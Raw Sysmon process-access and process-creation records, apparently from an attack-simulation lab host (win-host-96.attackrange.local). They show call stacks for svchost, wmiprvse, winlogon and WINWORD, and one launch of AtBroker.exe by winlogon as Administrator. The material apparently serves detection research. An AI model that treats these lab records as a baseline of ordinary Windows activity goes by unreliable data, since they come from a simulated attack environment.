12:24:43.394{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292354Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.394{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292353Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.394{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292352Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.394{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D4AB-6086-4401-00000000BB01}3848C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292351Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.394{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D4AB-6086-4401-00000000BB01}3848C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292350Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.378{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292349Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.378{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292348Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.378{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292347Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.378{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292346Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.378{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292345Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.378{BEA10069-D4AB-6086-4301-00000000BB01}33842096C:\Windows\system32\csrss.exe{BEA10069-028B-6088-0D2A-00000000BB01}3684C:\Windows\system32\atbroker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000292344Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.378{BEA10069-D4AB-6086-4401-00000000BB01}38483224C:\Windows\system32\winlogon.exe{BEA10069-028B-6088-0D2A-00000000BB01}3684C:\Windows\system32\atbroker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\winlogon.exe+15b13|C:\Windows\system32\winlogon.exe+3b284|C:\Windows\system32\winlogon.exe+38b7a|C:\Windows\system32\winlogon.exe+44b92|C:\Windows\system32\winlogon.exe+b12f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000292343Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.385{BEA10069-028B-6088-0D2A-00000000BB01}3684C:\Windows\System32\AtBroker.exe10.0.14393.0 (rs1_release.160715-1616)Windows Assistive Technology ManagerMicrosoft® Windows® Operating SystemMicrosoft CorporationATBroker.exeatbroker.exeC:\Windows\system32\WIN-HOST-96\Administrator{BEA10069-D4AE-6086-06A6-0F0000000000}0xfa6062HighMD5=8507D8A98EFA12F285A504DAEF14A0A5,SHA256=A84417EE9D039891AF43B267896DB921A40838D8A17CC1BE29785D031E5944D4,IMPHASH=9E9F046950193A8BA7AB446E4274C9D6{BEA10069-D4AB-6086-4401-00000000BB01}3848C:\Windows\System32\winlogon.exewinlogon.exe 10341000x8000000000000000292342Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.378{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292341Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.378{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292340Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.378{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292339Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.378{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292338Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.378{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292337Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.378{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292336Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.378{BEA10069-2590-6087-DA0F-00000000BB01}31564272C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE{BEA10069-D4AE-6086-4C01-00000000BB01}4036C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+bdd53|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+bdcf3|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+bdc66|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+bd60d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Program Files\Microsoft Office\root\Office16\wwlib.dll+3b117|C:\Program Files\Microsoft Office\root\Office16\wwlib.dll+1f2312|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE+1143|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE+1492|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292335Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.378{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292334Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.378{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292333Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.378{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292332Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.378{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292331Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.378{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292330Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 